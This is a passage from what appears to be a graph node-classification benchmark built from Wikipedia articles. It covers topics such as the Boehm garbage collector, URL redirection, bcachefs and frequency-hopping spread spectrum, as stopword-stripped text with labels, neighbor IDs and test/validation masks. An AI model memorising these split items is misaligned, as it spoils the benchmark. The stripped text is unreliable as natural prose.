    "text": "Boehm_garbage_collector:boehm garbage collector computer science boehm–demers–weiser garbage collector often simply known boehm gc conservative garbage collector c c++ boehm gc free software distributed permissive free software licence similar x11 license developer describes operation collector follows boehm gc also run leak detection mode memory management still done manually boehm gc check done properly way programmer find memory leaks double deallocations boehm gc also distributed c string handling library called cords similar ropes c++ strings trees small arrays never change instead using reference counting proper deallocation relies garbage collection free objects cords good handling large texts modifications middle slicing concatenating keeping history changes undo/redo functionality garbage collector works unmodified c programs simply replacing malloc gc_malloc calls replacing realloc gc_realloc calls removing free calls code piece shows one use boehm instead traditional malloc free c. boehm gc used many projects implemented c c++ like inkscape well runtime environments number languages including crystal gnu compiler java runtime environment portable.net project embeddable common lisp gnu guile mono implementation microsoft .net platform also using precise compacting gc since version 2.8 libgc-d binding libgc programming language used primarily mci supports numerous operating systems including many unix variants macos microsoft windows provides number advanced features including incremental collection parallel collection variety finalizer semantics",
    "neighbors": [
      2304,
      4865,
      4747,
      6797,
      9490,
      11539,
      10012,
      541,
      3871,
      1954,
      814,
      7983,
      3512,
      8000,
      2625,
      1474,
      1736,
      4424,
      6730,
      6221,
      5840,
      5074,
      6868,
      11221,
      86,
      5080,
      1247,
      8545,
      8573,
      2152,
      7403,
      5492,
      3705,
      634,
      2045,
      7039
    ],
    "mask": "Test"
  },
  {
    "node_id": 5009,
    "label": 3,
    "text": "Yamaha_CX5M:yamaha cx5m yamaha cx5m msx-system compatible computer expands upon normal features expected systems built-in eight-voice fm synthesizer module introduced 1984 yamaha corporation fm synth stereo audio outputs input purpose-built four-octave keyboard pair midi input/output ports could used normal midi second revision cx5m management data yamaha dx7 first model cx5m built msx standard included slots inserting programmed cartridges extended machine capability accepting range games office applications yamaha produced range cartridges including programmer yamaha dx range fm keyboards real-time sequencer two voice editor music composer allowed user program bank 48 sounds cx5 built synthesizer sequence eight channels music controlling built-in module external instruments via midi step-time using musical-stave input screen three versions cx5m released first contained fm module sfg-01 could receive external midi note information required proprietary keyboard used midi port output send data yamaha then-flagship dx7 second version cx5m ii cx7m/128 japan ref name= cx7/128 /ref upgraded fm system sfg-05 supported midi input thus allowed internal fm synth played external midi keyboard also later cx5m ii smaller differences later 1986 yamaha released yamaha fb-01 midi module effectively sfg-05 standalone portable case",
    "neighbors": [
      9006,
      5265,
      8945,
      8561
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5010,
    "label": 4,
    "text": "Global_Information_Assurance_Certification:global information assurance certification global information assurance certification giac information security certification entity specialises technical practical certification well new research form giac gold program sans institute founded certification entity 1999 term giac trademarked escal institute advanced technologies giac provides set vendor-neutral computer security certifications linked training courses provided sans giac specific leading edge technological advancement security order keep ahead black hat techniques papers written individuals pursuing giac certifications presented sans reading room giac website initially sans giac certifications required written paper practical specific area certification order achieve certification april 2005 sans organization changed format certification breaking two separate levels silver level certification achieved upon completion multiple choice exam gold level certification obtained completing research paper silver level prerequisite january 21 2017 giac granted 89,827 certifications worldwide",
    "neighbors": [
      2437,
      9607,
      8462,
      5010,
      7968,
      5284,
      8613,
      11182,
      6834,
      4789,
      8635,
      316,
      2494,
      830,
      10307,
      10437,
      6475,
      4049,
      10196,
      1493,
      6105,
      10717,
      4834,
      5475,
      357,
      7525,
      9319,
      3447,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 5011,
    "label": 3,
    "text": "After_Burner:burner game allows player control f-14 tomcat jet airplane player mission destroy enemy jets 18 stages start game player takes aircraft carrier called sega enterprise shares similar name one used 1986 film top gun also reference company name time sega enterprises ltd. arcade version jet employs machine gun limited number heat-seeking missiles master system version player unlimited missiles weapons replenished another aircraft beating stages aircraft cannon missile buttons controlled integrated flight stick game released two variations us standard upright cabinet rotating cockpit version cockpit version seat rotated horizontally cockpit rotated vertically featured two speakers head-level stereo sound seatbelt hold player cockpit rotated cabinets contained grey monitor frame flashing lights top indicated enemy lock player craft japan also got commander cabinet moves left right game ported amiga dos based pcs amstrad cpc atari st sharp x68000 fm towns commodore 64 master system pc engine sega saturn pc msx zx spectrum c64 two versions european version u.s. gold u.s. version activision weebee games port burner 32x done rutubo games known burner complete japan europe unlicensed nes port game developed tengen also exists reworked sunsoft japanese-exclusive port console port burner game boy advance included arcade 4 pack named sega arcade gallery computer gaming world reviewed burner master system citing aircraft depicted remarkable detail spectacular scenery excellent explosions later review pc much critical giving game one star five stating inferior arcade version zx spectrum 1988 conversion burner activision well-received sinclair user describing top-class coin-op conversion destined top charts giving 90 whilst crash magazine gave 86 overall reviewing 32x version gamepro commented graphics sound gameplay great difference genesis version burner ii minor graphical audio enhancements making worthwhile gamers never played burner game burner followed burner ii released year consider game revision predecessor rather entirely new game practice later repeated sega galaxy force galaxy force 2 although burner brand long dormant sega created number aerial combat games centered f-14 tomcat many similar features frequently regarded part series include sequel strike fighter later rebranded burner iii home release later games associated series include sky target retained similar gameplay presentation original addition 3d graphics sega strike fighter arcade flight combat game featured free-roaming movement boasting similar music f/a-18 hornet main plane 2006 sega released new sequel sega lindbergh hardware burner climax first arcade game bear brand since burner ii burner climax later ported xbox live arcade psn followed spinoff psp 2007 burner climax de-listed december 2014 leaving game longer available purchase march 2019 burner climax brought back digital platforms free ads sega ’ “ sega forever ” brand name emulated version burner playable in-game arcade shenmue 2 burner stage hazard final stage madworld shown replica jet spewing flames immediately incinerate enemy thrown plane burner makes cameo fighters megamix accessed cheat code music burner appears remix chapter 8 entitled route 666 bayonetta 2009 developed platinumgames published sega remix reused super smash bros. wii u super smash bros ultimate bayonetta stage umbra clock tower level based burner appears 2012 racing game sonic all-stars racing transformed f-14 tomcat also appears air vehicle unlockable character ages song burner ii appears 2010 rhythm game playable level sung character meiko arcade game appears 1990 hbo film dawn early light flight ready room b-52 bomber pilots lead character seen playing game tomcat crashing arcade version appears 1991 movie suburban commando starring hulk hogan shep ramsey plays game arcade scene however child playing acted space shooter game instead deluxe cabinet appears played john connor t-1000 searches galleria",
    "neighbors": [
      3307,
      8300,
      4716,
      9006,
      9166,
      629,
      11448,
      986,
      11452,
      11231
    ],
    "mask": "Test"
  },
  {
    "node_id": 5012,
    "label": 8,
    "text": "URL_redirection:url redirection url redirection also called url forwarding world wide web technique making web page available one url address web browser attempts open url redirected page different url opened similarly domain redirection domain forwarding pages url domain redirected different domain wikipedia.com wikipedia.net automatically redirected wikipedia.org url redirection done various reasons several reasons use url redirection user might mistype url example example.com exmaple.com organizations often register misspelled domains redirect correct location example.com addresses example.com example.net could redirect single domain web page example.org technique often used reserve top-level domains tld name make easier true .edu .net redirect recognizable .com domain web pages may redirected new domain three reasons url redirects incoming links outdated url sent correct location links might sites realized change bookmarks/favorites users saved browsers applies search engines often older/outdated domain names links database send search users old urls using moved permanently redirect new url visitors still end correct page also next search engine pass search engine detect use newer url access logs web servers keep detailed information visitors came browsed hosted site however log links visitors left visitor browser need communicate original server visitor clicks outgoing link information captured several ways one way involves url redirection instead sending visitor straight site links site direct url original website domain automatically redirects real target technique bears downside delay caused additional request original website server added request leave trace server log revealing exactly link followed also privacy issue technique also used corporate websites implement statement subsequent content another site therefore necessarily affiliated corporation scenarios displaying warning causes additional delay web applications often include lengthy descriptive attributes urls represent data hierarchies command structures transaction paths session information practice results url aesthetically unpleasant difficult remember may fit within size limitations microblogging sites url shortening services provide solution problem redirecting user longer url shorter one sometimes url page changes even though content stays therefore url redirection help users bookmarks routinely done wikipedia whenever page renamed post/redirect/get prg web development design pattern prevents duplicate form submissions user clicks refresh button submitting form creating intuitive interface user agents users redirects effectively used targeting purposes like geotargeting device targeting become increasingly important rise mobile clients two approaches serve mobile users make website responsive redirect mobile website version mobile website version offered users mobile clients automatically forwarded corresponding mobile content device targeting client-side redirects non-cacheable server-side redirects used geotargeting approach offer localized content automatically forward user localized version requested url helpful websites target audience one location and/or language usually server-side redirects used geotargeting client-side redirects might option well depending requirements redirects used manipulate search engines unethical intentions e.g. url hijacking goal misleading redirects drive search traffic landing pages enough ranking power remotely related search target approach requires rank range search terms number urls would utilize sneaky redirects forward searcher target page method revival uprise mobile devices device targeting url hijacking off-domain redirect technique exploited nature search engine handling temporary redirects temporary redirect encountered search engines decide whether assign ranking value url initializes redirect redirect target url url initiates redirect may kept show search results redirect indicates temporary nature certain circumstances possible exploit behaviour applying temporary redirects well-ranking urls leading replacement original url search results url initialized redirect therefore stealing ranking method usually combined sneaky redirects re-target user stream search results target page search engines developed efficient technologies detect kinds manipulative approaches major search engines usually apply harsh ranking penalties sites get caught applying techniques like url redirection sometimes used part phishing attacks confuse visitors web site visiting modern browsers always show real url address bar threat lessened however redirects also take sites otherwise attempt attack ways example redirect might take user site would attempt trick downloading antivirus software installing trojan sort instead link clicked browser sends along http request field called referer indicates source link field populated url current web page end logs server serving external link since sensitive pages may sensitive urls example codice_2 desirable codice_1 url leave organization redirection page performs referrer hiding could embedded external urls transforming example codice_4 codice_5 technique also eliminates potentially sensitive information referer url session id reduce chance phishing indicating end user passed clear gateway another site several different kinds response browser result redirection vary whether affect http headers html content techniques used typically depend role person implementing access different parts system example web author control headers might use refresh meta tag whereas web server administrator redirecting pages site likely use server configuration simplest technique ask visitor follow link new page usually using html anchor like method often used fall-back — browser support automatic redirect visitor still reach target document following link http protocol used world wide web redirect response status code beginning 3 causes browser display different page client encounters redirect needs make number decisions handle redirect different status codes used clients understand purpose redirect handle caching request method use subsequent request http/1.1 defines several status codes redirection rfc 7231 status codes require url redirect target given location header http response 300 multiple choices usually list choices body message show default choice location header status codes 304 modified 305 use proxy redirects http response 301 moved permanently redirect looks like http/1.1 301 moved permanently location http //www.example.org/ content-type text/html content-length 174 html head title moved /title /head body h1 moved /h1 p page moved href= http //www.example.org/ http //www.example.org/ /a /p /body /html web authors producing html content ca n't usually create redirects using http headers generated automatically web server program serving html file usually true even programmers writing cgi scripts though servers allow scripts add custom headers e.g enabling non-parsed-headers many web servers generate 3xx status code script outputs location header line example php one use header function headers may required prevent caching programmer must ensure headers output body may fit easily natural flow control code help frameworks server-side content generation buffer body data asp scripting language also accomplished using codice_6 codice_7 http/1.1 allows either relative uri reference absolute uri reference uri reference relative client computes required absolute uri reference according rules defined rfc 3986 apache http server mod_alias extension used redirect certain requests typical configuration directives look like flexible url rewriting redirection apache mod_rewrite used e.g. redirect requests canonical domain name configuration applied one sites server server configuration files single content directory codice_8 file nginx integrated http rewrite module used perform advanced url processing even web-page generation return directive showing example advanced use rewrite module mdoc.su implements deterministic url shortening service entirely help nginx configuration language alone example request /dragonflybsd/hammer.5 come along would first redirected internally /d/hammer.5 first rewrite directive affecting internal state without http replies issued client yet second rewrite directive http response 302 found status code would issued client actually redirect external cgi script web-man netscape introduced meta refresh feature refreshes page certain amount time specify new url replace one page another supported web browsers timeout zero seconds effects immediate redirect treated like 301 permanent redirect google allowing transfer pagerank target page example simple html document uses technique technique used web authors meta tag contained inside document meta tag must placed head section html file number 0 example may replaced another number achieve delay many seconds anchor body section users whose browsers support feature effect achieved http codice_9 header response easier generate cgi programs one need change default status code simple cgi program effects redirect note usually http server adds status line content-length header automatically w3c discourage use meta refresh since communicate information either original new resource browser search engine w3c web content accessibility guidelines 7.4 discourage creation auto-refreshing pages since web browsers allow user disable control refresh rate articles written issue include w3c web content accessibility guidelines 1.0 ensure user control time-sensitive content changes use standard redirects n't break back button core techniques web content accessibility guidelines 1.0 section 7 javascript cause redirect setting codice_10 attribute e.g window.location='http //www.example.com/' normally javascript pushes redirector site url browser history cause redirect loops users hit back button following command prevent type behaviour window.location.replace 'http //www.example.com/ however http headers refresh meta tag may preferred security reasons javascript executed browsers many web crawlers slightly different effect achieved creating inline frame one main difference redirect methods frame redirect browser displays url frame document url target page url bar cloaking technique may used reader sees memorable url fraudulently conceal phishing site part website spoofing html5 effect could done html frame contains target page one redirect may lead another example url http //wikipedia.com *.com domain first redirected https //www.wikipedia.org/ domain name .org navigate language-specific site unavoidable different links chain served different servers though minimised rewriting url much possible server returning browser redirect wikipedia redirecting pages https default since 2015 sometimes mistake cause page end redirecting back possibly via pages leading infinite sequence redirects browsers stop redirecting certain number hops display error message http/1.1 standard states client detect intervene cyclical redirections i.e. infinite redirection loops note earlier version specification recommended maximum five redirections rfc 2068 section 10.3 content developers need aware clients might implement fixed limitation note urls sequence might repeat e.g http //www.example.com/1 http //www.example.com/2 http //www.example.com/3 ... exist services perform url redirection demand need technical work access web server site hosted redirect service information management system provides internet link redirects users desired content typical benefit user use memorable domain name reduction length url web address redirecting link also used permanent address content frequently changes hosts similarly domain name system hyperlinks involving url redirection services frequently used spam messages directed blogs wikis thus one way reduce spam reject edits comments containing hyperlinks known url redirection services however also remove legitimate edits comments may effective method reduce spam recently url redirection services taken using ajax efficient user friendly method creating shortened urls major drawback url redirection services use delay pages frame based advertising generate revenue first redirect services took advantage top-level domains tld .to tonga .at austria .is iceland goal make memorable urls first mainstream redirect service v3.com boasted 4 million users peak 2000 v3.com success attributed wide variety short memorable domains including r.im go.to i.am come.to start.at v3.com acquired fortunecity.com large free web hosting company early 1999 sales price top level domains started falling 70.00 per year less 10.00 use redirection services declined launch tinyurl 2002 new kind redirecting service born namely url shortening goal make long urls short able post internet forums since 2006 140 character limit extremely popular twitter service short url services heavily used redirection services hide referrer placing intermediate page page link destination although conceptually similar url redirection services serve different purpose rarely attempt shorten obfuscate destination url intended side-effect hide referrer information provide clear gateway websites type redirection often used prevent potentially-malicious links gaining information using referrer example session id query string many large community websites use link redirection external links lessen chance exploit could used steal account information well make clear user leaving service lessen chance effective phishing simplistic example service written php example check called e.g referrer although could spoofed also check url provided means malicious person could link redirection page using url parameter his/her selection page uses web server resources url redirection abused attackers phishing attacks open redirect covert redirect open redirect application takes parameter redirects user parameter value without validation covert redirect application takes parameter redirects user parameter value without sufficient validation disclosed may 2014 mathematical doctoral student wang jing nanyang technological university singapore",
    "neighbors": [
      2945,
      1667,
      7044,
      10756,
      3462,
      7304,
      5641,
      8202,
      9737,
      7949,
      10103,
      914,
      11154,
      10390,
      10263,
      7962,
      8093,
      8224,
      10275,
      3237,
      8747,
      2227,
      2485,
      1723,
      10815,
      8644,
      2887,
      3145,
      7370,
      1495,
      3032,
      5724,
      9053,
      2016,
      865,
      6498,
      6762,
      1643,
      1899,
      113,
      6002,
      119,
      7673,
      124
    ],
    "mask": "None"
  },
  {
    "node_id": 5013,
    "label": 6,
    "text": "Bcachefs:bcachefs bcachefs copy-on-write cow file system linux-based operating systems primary developer kent overstreet first announced 2015 efforts ongoing included mainline linux kernel intended compete modern features zfs btrfs speed performance ext4 xfs bcachefs copy-on-write cow file system linux-based operating systems planned existing features bcachefs include caching full file-system encryption using chacha20 poly1305 algorithms native compression via zlib lz4 zstandard snapshots crc-32c 64-bit checksumming use multiple block devices including raid configurations bcachefs provides functionality bcache block-layer cache system linux bcachefs shares 80 code primary development kent overstreet developer bcache describes prototype ideas became bcachefs overstreet intends bcachefs replace bcache overstreet stated development bcachefs began bcache developers realized codebase evolving ... full blown general-purpose posix filesystem really clean elegant design within took direction time bcache merged 2013 mainline linux kernel overstreet left job google work full-time bcachefs years unfunded development overstreet announced bcachefs 2015 point called code less feature complete called testers contributors intended advanced file system modern features like zfs btrfs speed performance file systems ext4 xfs 2017 overstreet receiving financial support development bcachefs via patreon mid-2018 on-disk format settled patches submitted review bcachefs included mainline linux kernel yet accepted",
    "neighbors": [
      5120,
      2051,
      6669,
      3598,
      10257,
      6677,
      5142,
      8214,
      9762,
      5158,
      3629,
      11323,
      8772,
      4708,
      9836,
      7789,
      9333,
      6263,
      9335,
      9343,
      7818,
      654,
      2193,
      2194,
      2197,
      2199,
      11419,
      6309,
      1190,
      5286,
      10405,
      5293,
      7344,
      2230,
      5816,
      1212,
      8380,
      10951,
      9420,
      3795,
      4819,
      8404,
      728,
      8410,
      6365,
      7907,
      8938,
      1263,
      3312,
      3826,
      2291,
      246,
      3834,
      3328,
      11012,
      2314,
      8461,
      6416,
      6935,
      11033,
      287,
      1825,
      6434,
      2339,
      5413,
      3368,
      9004,
      302,
      7983,
      6961,
      823,
      3909,
      2378,
      4431,
      346,
      2395,
      2397,
      10596,
      6519,
      376,
      11128,
      890,
      7554,
      8075,
      11675,
      414,
      2974,
      7070,
      935,
      4012,
      1454,
      6062,
      8114,
      7603,
      1464,
      1978,
      8643,
      7126,
      1509,
      9189,
      11256,
      3582
    ],
    "mask": "Test"
  },
  {
    "node_id": 5014,
    "label": 3,
    "text": "Sakhr_Computers:sakhr computers sakhr computers developed kuwaiti company al alamiah produced arabic-language version msx computers 1980s products included msx2 msx2+ yamaha ax100 models latter known sakhr msx ax170 company also first convert basic computer language arabic",
    "neighbors": [
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 5015,
    "label": 7,
    "text": "ASCI_White:asci white asci white supercomputer lawrence livermore national laboratory california briefly fastest supercomputer world computer cluster based ibm commercial rs/6000 sp computer 512 nodes interconnected asci white node containing sixteen 375mhz ibm power3-ii processors total asci white 8,192 processors 6terabytes tb memory 160tb disk storage almost exclusively used large-scale computations requiring dozens hundreds thousands processors computer weighed 106tons consumed 3mw electricity 3mw needed cooling theoretical processing speed 12.3teraflops tflops system ran ibm aix operating system asci white made three individual systems 512-node white 28-node ice 68-node frost system built poughkeepsie new york completed june 2000 transported specially built facilities california officially dedicated august 15 2001 peak performance 12.3tflops achieved widely accepted linpack tests system cost us 110 million built stage three accelerated strategic computing initiative asci started u.s. department energy national nuclear security administration build simulator replace live wmd testing following moratorium testing started president george h. w. bush 1992 extended bill clinton 1993 machine decommissioned beginning july 27 2006",
    "neighbors": [
      1480,
      3978,
      1933,
      2135,
      3323,
      1725
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5016,
    "label": 4,
    "text": "GPGMail:gpgmail gpgmail extension apple mail provides public key email encryption signing gpgmail works macos actual cryptographic functionality handled gnu privacy guard gpgmail first released february 7 2001 stéphane corthésy since 2010 maintained gpgtools gnu privacy guard free open-source software use gpgmail requires purchase support plan september 21 2018 developer introduced gpgmail 3.0 part gpg suite 2018.4 new software release included support macos mojave release developer removed free license option gpgmail lot users relied automated upgrades caught surprise prompted significant backlash community licensing change identified release notes gpg suite 2018.4 many believed big change required prominent notification avoid perception bait switch",
    "neighbors": [
      2050,
      9451,
      11046,
      7983
    ],
    "mask": "None"
  },
  {
    "node_id": 5017,
    "label": 7,
    "text": "ServiceMax:servicemax servicemax global market-leader service execution management software category includes field service management asset service management servicemax provides cloud-based software platform improves productivity complex equipment-centric service execution oems operators 3rd-party service providers servicemax platform saas software service software running salesforce force.com cloud technology servicemax cloud-based mobile-ready field service software solution supports companies across industries manage work orders plan schedule work assignments provide mobile technician enablement contracts entitlements proactive maintenance parts inventory management servicemax platform designed optimize service execution processes used service technicians dispatchers service planners managers customers include medical device manufacturing industrial manufacturing food beverage equipment buildings construction technology oil gas power utilities industries servicemax software primarily used enterprise size customers october 2018 servicemax introduced asset service management solution equipment operators augmenting existing field service management software typically used original equipment manufacturers service organizations commercial service operations february 2019 servicemax acquired zinc adding secure real-time communications solution portfolio zinc mode communications offering provides 1:1 group messaging voice video content sharing top-down broadcasts hotlines communications analytics recent areas innovation include capabilities complex jobs functionality crew management shift planning maxplore technologies founded athani krishnaprasad hari subramanian consulting company focusing customer relationship management client requested maxplore build field service module salesforce platform project took 2 weeks 2007 entered “ appexchange challenge ” dreamforce conference project 2 million funding emergence capital went win force million dollar challenge 2008 company changed name servicemax february 2019 servicemax acquired zinc company providing frictionless way service workers get share knowledge real-time 2016 servicemax received 204 million funding company completed 82 million series f round august 2015 led premjiinvest ge march 2014 company received 71 million series e funding led meritech capital partners november 2012 servicemax received 27 million series funding round june 2011 company received 14 million series c funding led mayfield fund april 2010 servicemax received 8 million series b funding led trinity ventures november 14 2016 general electric co. ge digital unit announced deal buy servicemax 915 million acquisition completed january 10 2017 december 13 2018 ge digital silverlake announced agreement ge digital sell majority stake servicemax ge retained 10 equity ownership company",
    "neighbors": [
      10090,
      467
    ],
    "mask": "Test"
  },
  {
    "node_id": 5018,
    "label": 4,
    "text": "Reboot_to_restore_software:reboot restore software ‘ reboot restore ’ system restore technology enables restoring user-defined system configuration computing device every restart technology helps maintain systems optimum working conditions useful especially multi-user computing environments deploying solutions based reboot restore technology enables users define particular system configuration desired state baseline point would restored reboot baseline set reboot restore software continues restore particular configuration every time device restarted switched shutdown reboot restore software helps maintaining optimal system configuration quite effective multi-user computing environment technology prevents types alterations baseline configuration whether user inflicted automatic alterations end-users primarily changes system settings installing uninstalling software applications enabling disabling specific functionalities automatic alterations include cookies add-ons browser extensions several types temporary files often get downloaded background online session also rolls back malicious alterations made malware elusively penetrate system attempts corrupt reboot restore software solutions built simplify process maintaining optimal system configuration devices multi-user computing environment public libraries computer labs educational institutes k-12 colleges universities training centers public access kiosks due constant use multiple people wide range purposes devices become susceptible performance deterioration malware infiltration events system malfunction failure takes considerably longer time troubleshoot issue using conventional practices like resetting reimaging may lead prolonged downtime causing poor user experience potential loss business opportunity higher maintenance costs restore reboot functionality ensures best system configuration pristine state maintained every public-access computer without long-drawn troubleshooting steps instant restoration technology empowers end-users resolve system issues simply restarting device significantly reduces intervention end-users experience optimum system performance pristine configuration restored every reboot technology helps deliver maximum system uptime improves operational efficiency resource utilization system administrators corporates deploy reboot restore solutions create prestige environments without need constant troubleshooting use software protect system drive allocate separate data partition user application data stored redirected initially named shared computer toolkit windows steadystate freeware reboot restore solution offered microsoft compatible windows xp windows vista operating systems windows steadystate discontinued december 2010 software primarily used educational institutes public libraries steadystate features windows disk protection wdp functionality enabled redirects user-generated changes cache software three modes discard persist commit discard mode clears cache reboot restores original configuration persist mode retains cache specific time admins could opt discard commit changes commit mode changes permanently written hard disk usual deep freeze faronics one first rollback software solutions leverage reboot restore technology releasing first windows solution 1999 followed mac os solution 2005 deep freeze uses patented technology redirects information written hard drive partition allocation table leaving original data intact redirected information allocation table longer referenced computer restarted therefore restoring computer back original state disk sector level last byte extending functionalities reboot restore technology software provision thawspaces thawed partitions permanently saving user-generated data without altering baseline configuration thawspace virtual space system administrators create within deep freeze ecosystem hard disk partition content stored thawspace retained across reboots thawed partitions parts hard disk exempted effects reboot restore technology microsoft apple inc. offer restoration tools though based reboot restore technology embedded respective operating systems system restore inbuilt feature windows available latest versions os reverts system files settings previous point time without affecting personal files enabled software automatically creates restore points regular intervals every major instance configuration alteration like driver update new application installation device malfunctions running system restore rolls back configuration restore point particular issue exist reset option introduced windows 8 used restoring systems factory defaults re-installs windows os permanently discards files system settings pre-installed applications time machine macos functions backup utility restoration program creates incremental snapshots system configuration periodically requires external storage device backing macos backup later used restore previous configuration required software also used restore specific items like deleted emails older versions files rather entire configuration also introduced windows 8 refresh re-installs windows os retains user files pre-installed applications installed users running reset option advised refresh fails resolve issue",
    "neighbors": [
      7380,
      925
    ],
    "mask": "Test"
  },
  {
    "node_id": 5019,
    "label": 2,
    "text": "Nokia_N810:nokia n810 nokia n810 internet tablet internet appliance nokia announced 17 october 2007 web 2.0 summit san francisco despite nokia strong association cellular products n810 like preceding tablets produced nokia phone instead allowed user browse internet communicate using wi-fi networks mobile phone via bluetooth built hardware software nokia n800 features added removed nokia n810 featured maemo linux distribution operating system based maemo 4.0 featured microb mozilla-based mobile browser gps navigation application new media player refreshed interface nokia n810 much common n800 internet tablet os 2008 operated significant differences two new features nokia n810 1 april 2008 nokia announced wimax equipped version n810 called n810 wimax edition device identical specifications original n810 included wimax radio use initially sprint xohm network featured color change light gray dark blue black well larger case-back bulge accommodate antenna efficient required bands production wimax edition nokia n810 ended january 2009 n810 like nokia internet tablets ran maemo similar many handheld operating systems provided home screen — central point applications settings accessed home screen divided areas launching applications menu bar large customisable area could display information rss reader internet radio player google search box example maemo modified version debian gnu/linux n810 bundled several applications including mozilla-based microb browser adobe flash gizmo skype mobile firefox fennec also made available n810 promised make users forget clunky stripped-down mobile web 're used installation added mozilla repository application manager allowing automatic notification updates",
    "neighbors": [
      1537,
      3585,
      529,
      10770,
      5143,
      2072,
      5659,
      6178,
      4132,
      40,
      3626,
      9266,
      10802,
      7220,
      5175,
      10820,
      6216,
      11337,
      9292,
      7246,
      1615,
      5201,
      7253,
      5211,
      6748,
      1633,
      109,
      2179,
      3205,
      9359,
      1682,
      10393,
      5274,
      669,
      6310,
      167,
      5290,
      10410,
      7866,
      1728,
      4291,
      708,
      7877,
      199,
      4305,
      6870,
      5339,
      2784,
      9443,
      3300,
      4324,
      7399,
      8423,
      2285,
      1776,
      8433,
      2308,
      8472,
      11545,
      7983,
      821,
      823,
      1849,
      7492,
      10053,
      3911,
      6996,
      854,
      10583,
      10599,
      6505,
      9581,
      5998,
      10606,
      2420,
      10109,
      8577,
      11655,
      1424,
      2449,
      8083,
      405,
      7063,
      5019,
      4003,
      7617,
      967,
      9163,
      6618,
      1533
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5020,
    "label": 5,
    "text": "Frequency-hopping_spread_spectrum:frequency-hopping spread spectrum frequency-hopping spread spectrum fhss method transmitting radio signals rapidly switching carrier among many frequency channels using pseudorandom sequence known transmitter receiver used multiple access method code division multiple access cdma scheme frequency-hopping code division multiple access fh-cdma available frequency band divided sub-frequencies signals rapidly change hop among predetermined order interference specific frequency affect signal short interval fhss however cause interference adjacent direct-sequence spread spectrum dsss systems adaptive frequency-hopping spread spectrum afh specific type fhss used bluetooth wireless data transfer spread-spectrum transmission offers three main advantages fixed-frequency transmission spread-spectrum signals highly resistant deliberate jamming unless adversary knowledge spreading characteristics military radios use cryptographic techniques generate channel sequence control secret transmission security key transec sender receiver share advance frequency hopping provides limited protection eavesdropping jamming modern military frequency hopping radios also employ separate encryption devices ky-57 speech security equipment u.s. military radios use frequency hopping include jtids/mids family quick aeronautical mobile communications system sincgars combat net radio link-16 us since federal communications commission fcc amended rules allow frequency hopping spread spectrum systems unregulated 2.4 ghz band many consumer devices band employed various spread-spectrum modes walkie-talkies employ frequency-hopping spread spectrum technology developed unlicensed use 900 mhz band several radios marketed name extreme radio service exrs despite name similarity frs allocation system proprietary design rather official fcc allocated service frequency-hopping spread spectrum technology also used many hobby rc radio controlled transmitters receivers used model cars airplanes drones type multiple access achieved allowing hundreds transmitter/receiver pairs operated simultaneously band contrast previous fm rc systems limited simultaneous channels motorola deployed business-banded license-free digital radio uses fhss technology dtr series models 410 550 650 overall bandwidth required frequency hopping much wider required transmit information using one carrier frequency however transmission occurs small portion bandwidth given time effective interference bandwidth really providing extra protection wideband thermal noise frequency-hopping approach reduce degradation caused narrowband interference sources one challenges frequency-hopping systems synchronize transmitter receiver one approach guarantee transmitter use channels fixed period time receiver find transmitter picking random channel listening valid data channel transmitter data identified special sequence data unlikely occur segment data channel segment also checksum integrity checking identification transmitter receiver use fixed tables channel sequences synchronized maintain communication following table channel segment transmitter send current location table us fcc part 15 unlicensed spread spectrum systems 902–928 mhz 2.4 ghz bands permits power allowed non-spread-spectrum systems frequency hopping direct sequence systems transmit 1 watt thousand-fold increase 1 milliwatt limit non-spread-spectrum systems federal communications commission fcc also prescribes minimum number channels maximum dwell time channel real multipoint spread spectrum radio system space allows possibility multiple transmissions frequency using multiple radios geographic area creates possibility system data rates higher shannon limit single channel spread spectrum systems violate shannon limit spread spectrum systems rely excess signal noise ratios sharing spectrum property also seen mimo dsss systems beam steering directional antennas also facilitate increased system performance providing isolation remote radios 1899 guglielmo marconi experimented frequency-selective reception attempt minimise interference earliest mentions frequency hopping open literature us patent 725,605 awarded nikola tesla march 17 1903 radio pioneer jonathan zenneck book wireless telegraphy german 1908 english translation mcgraw hill 1915 although zenneck states telefunken already tried nikola tesla ’ mention phrase “ frequency hopping ” directly certainly alludes entitled method signaling patent describes system would enable radio communication without danger signals messages disturbed intercepted interfered way german military made limited use frequency hopping communication fixed command points world war prevent eavesdropping british forces technology follow sequence polish engineer inventor leonard danilewicz came idea 1929 several patents taken 1930s including one willem broertjes issued aug. 2 1932 world war ii us army signal corps inventing communication system called sigsaly incorporated spread spectrum single frequency context however sigsaly top-secret communications system existence become known 1980s 1942 actress hedy lamarr composer george antheil received secret communications system intended early version frequency hopping supposed use piano-roll change among 88 frequencies intended make radio-guided torpedoes harder enemies detect jam record working device ever produced patent rediscovered 1950s patent searches private companies independently developed code division multiple access non-frequency-hopping form spread-spectrum cited numerous times since practical application frequency hopping developed ray zinn co-founder micrel corporation zinn developed method allowing radio devices operate without need synchronize receiver transmitter using frequency hopping sweep modes zinn method primarily applied low data rate wireless applications utility metering machine equipment monitoring metering remote control 2006 zinn received wireless device method using frequency hopping sweep modes adaptive frequency-hopping spread spectrum afh used bluetooth improves resistance radio frequency interference avoiding crowded frequencies hopping sequence sort adaptive transmission easier implement fhss dsss key idea behind afh use “ good ” frequencies avoiding bad frequency channels—perhaps bad frequency channels experiencing frequency selective fading perhaps third party trying communicate bands perhaps bands actively jammed therefore afh complemented mechanism detecting good/bad channels however radio frequency interference dynamic strategy “ bad channel removal ” applied afh might work well example several colocated frequency-hopping networks bluetooth piconet mutually interfering strategy afh fails avoid interference problem dynamic interference gradual reduction available hopping channels backward compatibility legacy bluetooth devices resolved version 1.2 bluetooth standard 2003 strategies dynamic adaptation frequency hopping pattern reported literature situation often happen scenarios use unlicensed spectrum addition dynamic radio frequency interference expected occur scenarios related cognitive radio networks devices exhibit frequency-agile operation chirp modulation seen form frequency-hopping simply scans available frequencies consecutive order communicate concept also use combination frequency hopping spread spectrum ofdm non-orthogonal frequency-division multiplexing n-ofdm signals increase data performance",
    "neighbors": [
      10112,
      2306,
      388,
      8708,
      3847,
      9863,
      2057,
      10381,
      1550,
      2968,
      11288,
      2458,
      5664,
      11686,
      1192,
      7723,
      11181,
      1070,
      1969,
      2994,
      5304,
      7490,
      3140,
      7108,
      9284,
      11591,
      5321,
      7498,
      2911,
      3040,
      1121,
      2785,
      3168,
      5092,
